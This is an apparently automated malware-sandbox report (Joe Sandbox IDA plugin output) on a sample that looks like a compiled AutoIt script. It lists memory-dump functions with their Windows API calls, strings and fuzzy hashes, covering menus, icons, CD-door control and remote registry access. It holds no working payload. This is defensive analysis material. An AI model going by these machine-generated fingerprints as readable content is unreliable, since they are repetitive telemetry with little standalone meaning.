GETITEMCOUNT, xrefs: 00A94551
GETSELECTED, xrefs: 00A9457F
SELECT, xrefs: 00A94620

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 3b3ef91846cca336430bc29bff9ae9964318a4631fbece38efa481071ad10714
Instruction ID: 133a1afa2e17072ddc508650a1af4ecc87eb996f50c472142c66aaa567835214
Opcode Fuzzy Hash: 3b3ef91846cca336430bc29bff9ae9964318a4631fbece38efa481071ad10714
Instruction Fuzzy Hash: 30913C716047019FCB04EF20C561EAEB7E5AF99394F05486CF8965B3A2CB31ED4ACB85

Function 00A9B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A9B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00A991C2), ref: 00A9B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A9B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A9B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A9B9C3
FreeLibrary.KERNEL32(?), ref: 00A9B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A9B9DF
DestroyIcon.USER32(?,?,?,?,?,00A991C2), ref: 00A9B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A9BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A9BA17

Part of subcall function 00A32EFD: __wcsicmp_l.LIBCMT ref: 00A32F86

Strings

.dll, xrefs: 00A9B86D
.exe, xrefs: 00A9B84A
.icl, xrefs: 00A9B82A

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 2bbb1de0e50905641c05d5e16976a5bc4f04370e913d2f80a291d4df4a5fab59
Instruction ID: 540f3e38bd8db24812f0175e8296aa5e1ef80d1e95f096971fdc32deabd0b559
Opcode Fuzzy Hash: 2bbb1de0e50905641c05d5e16976a5bc4f04370e913d2f80a291d4df4a5fab59
Instruction Fuzzy Hash: 2F61DD71A20219BEEF14DFA4EE45FBA7BACEB08710F10851AF915D61C0DB749981DBA0

Function 00A7A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC

CharLowerBuffW.USER32(?,?), ref: 00A7A3CB
GetDriveTypeW.KERNEL32 ref: 00A7A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A7A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A7A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A7A4C5

Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06

Strings

wait, xrefs: 00A7A482
close, xrefs: 00A7A3D1
type cdaudio alias cd wait, xrefs: 00A7A443
set cd door , xrefs: 00A7A466
open, xrefs: 00A7A3F2
close cd wait, xrefs: 00A7A4B0
closed, xrefs: 00A7A3DF, 00A7A3E8
open , xrefs: 00A7A427

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 1000826c6b1b52aadd7284695b02948fb1983cd1efd4e482530d351a0ae229fd
Instruction ID: 9631be307a51abb3ea2273474a18c0d225674e9962201acb5675474e1819f0c4
Opcode Fuzzy Hash: 1000826c6b1b52aadd7284695b02948fb1983cd1efd4e482530d351a0ae229fd
Instruction Fuzzy Hash: 27512A75508205AFC700EF20C991DAEB7F8FF94758F10886DF89A97261DB31AD4ACB52

Function 00A6F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00A4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00A6F8DF
LoadStringW.USER32(00000000,?,00A4E029,00000001), ref: 00A6F8E8

Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22

GetModuleHandleW.KERNEL32(00000000,00AD5310,?,00000FFF,?,?,00A4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00A6F90A
LoadStringW.USER32(00000000,?,00A4E029,00000001), ref: 00A6F90D
__swprintf.LIBCMT ref: 00A6F95D
__swprintf.LIBCMT ref: 00A6F96E
_wprintf.LIBCMT ref: 00A6FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A6FA2E

Strings

^ ERROR, xrefs: 00A6F9C3
Line %d:, xrefs: 00A6F968
%s (%d) : ==> %s: %s %s, xrefs: 00A6FA12
Line %d (File "%s"):, xrefs: 00A6F957
Error: , xrefs: 00A6F9E5

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 4c88aaeda1395bb6cc935a07787bc2bb1babf5568ffa06bd8a841cafbd75783b
Instruction ID: a0b945536a237fe4bb8ae9ce6a72645be78357175c0551b7b649d372803f4770
Opcode Fuzzy Hash: 4c88aaeda1395bb6cc935a07787bc2bb1babf5568ffa06bd8a841cafbd75783b
Instruction Fuzzy Hash: 76410D72904109AACF05FBE4DE46EEE7778AF54340F500465F506B6092EF356F49CB61

Function 00A9BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00A99207,?,?), ref: 00A9BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00A99207,?,?,00000000,?), ref: 00A9BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00A99207,?,?,00000000,?), ref: 00A9BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00A99207,?,?,00000000,?), ref: 00A9BA85
GlobalLock.KERNEL32(00000000), ref: 00A9BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A99207,?,?,00000000,?), ref: 00A9BA9D
GlobalUnlock.KERNEL32(00000000), ref: 00A9BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00A99207,?,?,00000000,?), ref: 00A9BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A99207,?,?,00000000,?), ref: 00A9BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00AA2CAC,?), ref: 00A9BAD7
GlobalFree.KERNEL32(00000000), ref: 00A9BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 00A9BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00A9BB36
DeleteObject.GDI32(00000000), ref: 00A9BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A9BB74

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 9f17b8de9df6cabecbcff9a5005f3d9d21808a1cd3a7a3861fce2d015f27c63b
Instruction ID: 7e774b76f210af669e37fd0fbee33e07839848e4ab6b90d893e10fe09df43702
Opcode Fuzzy Hash: 9f17b8de9df6cabecbcff9a5005f3d9d21808a1cd3a7a3861fce2d015f27c63b
Instruction Fuzzy Hash: F5410975600208EFDB11DFA5ED88EAA7BF9FB89711F104169F909D72A0DB709D02CB60

Function 00A7D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00A7DA10
_wcscat.LIBCMT ref: 00A7DA28
_wcscat.LIBCMT ref: 00A7DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A7DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 00A7DA63
GetFileAttributesW.KERNEL32(?), ref: 00A7DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00A7DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 00A7DAA7

Strings

*.*, xrefs: 00A7DAE6

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 105b94f80ffaa04539460bff08ee87c788b690e295d21ff9c386b95c652a9725
Instruction ID: aa139af06cd69f784ca73cc1e2c072130acfa4584a3b52cad660f44e877ab781
Opcode Fuzzy Hash: 105b94f80ffaa04539460bff08ee87c788b690e295d21ff9c386b95c652a9725
Instruction Fuzzy Hash: 288161726042419FCB24DF64CD44AAAB7F8BF89350F18C82EF98DDB651E630D945CB52

Function 00A9C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A9C1FC
GetFocus.USER32 ref: 00A9C20C
GetDlgCtrlID.USER32(00000000), ref: 00A9C217
_memset.LIBCMT ref: 00A9C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A9C36D
GetMenuItemCount.USER32(?), ref: 00A9C38D
GetMenuItemID.USER32(?,00000000), ref: 00A9C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A9C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A9C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A9C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00A9C489

Strings

0, xrefs: 00A9C33A

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: c68cc79c32c978a551f16620da81169790ca6ab636f77fa436182f566222170e
Instruction ID: 9d06f2fe0bb6ad9ab4869baa9b86531d46adc284469b3629dc421eacd7b13928
Opcode Fuzzy Hash: c68cc79c32c978a551f16620da81169790ca6ab636f77fa436182f566222170e
Instruction Fuzzy Hash: 7681AF707087119FDB10DF64C998ABBBBE8FB88724F10492EF99597291C730D901CBA2

Function 00A8731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00A8738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00A8739B
CreateCompatibleDC.GDI32(?), ref: 00A873A7
SelectObject.GDI32(00000000,?), ref: 00A873B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00A87408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00A87444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00A87468
SelectObject.GDI32(00000006,?), ref: 00A87470
DeleteObject.GDI32(?), ref: 00A87479
DeleteDC.GDI32(00000006), ref: 00A87480
ReleaseDC.USER32(00000000,?), ref: 00A8748B

Strings

(, xrefs: 00A87410

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 6b9025326c3a25e56fda3e1bd839e4c1d2d2653e95c2ab0368208d3293554137
Instruction ID: 126bad72f23cf775ffd3248aa633973a649333ad8c0bdda704f1598b99d3b224
Opcode Fuzzy Hash: 6b9025326c3a25e56fda3e1bd839e4c1d2d2653e95c2ab0368208d3293554137
Instruction Fuzzy Hash: 6A513875A04309EFCB14DFA8DC85EAEBBB9EF48310F24852AF959D7211D731A9418B50

Function 00A16A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00A30957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A16B0C,?,00008000), ref: 00A30973

Part of subcall function 00A14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A14743,?,?,00A137AE,?), ref: 00A14770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A16BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00A16CFA

Part of subcall function 00A1586D: _wcscpy.LIBCMT ref: 00A158A5

Part of subcall function 00A3363D: _iswctype.LIBCMT ref: 00A33645

Strings

Bad directive syntax error, xrefs: 00A4E79D
AU3!, xrefs: 00A16B61
EA06, xrefs: 00A4E452
Unterminated string, xrefs: 00A4E7E4
Error opening the file, xrefs: 00A4E43D, 00A4E4B8
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00A4E421
>>>AUTOIT SCRIPT<<<, xrefs: 00A4E496

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 779c09553febc01d71bade8983a8fb9d0c84cc2b8b38488687b77f76a0d47e12
Instruction ID: 9b1c77492959579d9970e87b472a206e6d34530604eab6fd786c00e7f80262b6
Opcode Fuzzy Hash: 779c09553febc01d71bade8983a8fb9d0c84cc2b8b38488687b77f76a0d47e12
Instruction Fuzzy Hash: C10277355083409FC724EF24DA81AAFBBE5BFD8314F14491DF49A972A2DB30D989CB52

Function 00A72D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A72D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00A72DDD
GetMenuItemCount.USER32(00AD5890), ref: 00A72E66
DeleteMenu.USER32(00AD5890,00000005,00000000,000000F5,?,?), ref: 00A72EF6
DeleteMenu.USER32(00AD5890,00000004,00000000), ref: 00A72EFE
DeleteMenu.USER32(00AD5890,00000006,00000000), ref: 00A72F06
DeleteMenu.USER32(00AD5890,00000003,00000000), ref: 00A72F0E
GetMenuItemCount.USER32(00AD5890), ref: 00A72F16
SetMenuItemInfoW.USER32(00AD5890,00000004,00000000,00000030), ref: 00A72F4C
GetCursorPos.USER32(?), ref: 00A72F56
SetForegroundWindow.USER32(00000000), ref: 00A72F5F
TrackPopupMenuEx.USER32(00AD5890,00000000,?,00000000,00000000,00000000), ref: 00A72F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A72F7E

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 115eb18aa68384af0964d2e83e1e6a9ab6f928bfd179ebede43892ecfa4b36d2
Instruction ID: 647e14dc83a2251e48c2bf9fe85bc7920ce78b37f40ca826894fd2aef95ce3ca
Opcode Fuzzy Hash: 115eb18aa68384af0964d2e83e1e6a9ab6f928bfd179ebede43892ecfa4b36d2
Instruction Fuzzy Hash: AD71B171601205BFEB219F54DC85FAABFA4FB04364F14C226F629AA1E1CBB15C60DB94

Function 00A677DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06

_memset.LIBCMT ref: 00A6786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A678A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A678BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00A678D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00A67902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00A6792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A67935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A6793A

Strings

\CLSID, xrefs: 00A67822
\IPC$, xrefs: 00A67882
SOFTWARE\Classes\, xrefs: 00A6780C

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 4f80a6503245d8271cc0d4be38e7e276d63c7d9affa76f8c805f09e27f39c1fe
Instruction ID: 2645bce1b91f3130f281cf99a4a9880574ee41ae52b351993eacf255da4a05b1
Opcode Fuzzy Hash: 4f80a6503245d8271cc0d4be38e7e276d63c7d9affa76f8c805f09e27f39c1fe
Instruction Fuzzy Hash: A7410372C1422DAACF21EBA4DD85DEEB7B8BF04310F04442AF915A3261EA309E45CB90

Function 00A90E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A8FDAD,?,?), ref: 00A90E31

Strings

HKCU, xrefs: 00A90F21
HKLM, xrefs: 00A90EAF
HKEY_CURRENT_USER, xrefs: 00A90F10
HKEY_LOCAL_MACHINE, xrefs: 00A90E9A
HKEY_CLASSES_ROOT, xrefs: 00A90EC4
HKCC, xrefs: 00A90EFF
HKCR, xrefs: 00A90ED9
HKEY_USERS, xrefs: 00A90F32
HKU, xrefs: 00A90F43
HKEY_CURRENT_CONFIG, xrefs: 00A90EEE

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: b2636f443644bb09f36f6761c625a644b35777fd30a6c87bc9dc2cdb97e74b8f
